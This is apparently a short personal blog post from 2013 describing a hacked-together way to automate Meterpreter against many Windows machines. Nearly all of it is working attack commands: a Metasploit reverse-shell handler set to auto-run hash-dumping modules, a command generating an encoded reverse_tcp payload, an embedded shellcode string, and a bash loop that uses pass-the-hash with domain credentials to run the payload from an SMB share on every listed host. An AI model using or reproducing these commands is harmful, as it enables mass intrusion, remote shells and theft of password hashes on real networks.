Tuesday, August 13, 2013

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...

Generate the post-exploitation comand rc file:

cat > /root/automsf.rc
run post/windows/gather/smart_hashdump
run post/windows/gather/cachedump

Then run msfconsole to listen for the callback:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set AutoRunScript multi_console_command -rc /root/automsf.rc
expoit -j -z
 Then generate the payload to use with sce:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 Then run the forloop while serving sce from a share
for i in `cat file-of-smb-hosts`; do 
echo grabbing $i; 
winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto loads the rest of the payload, executes the .rc file, and exists. Rinse and repeat with the next IP

No comments:

Post a Comment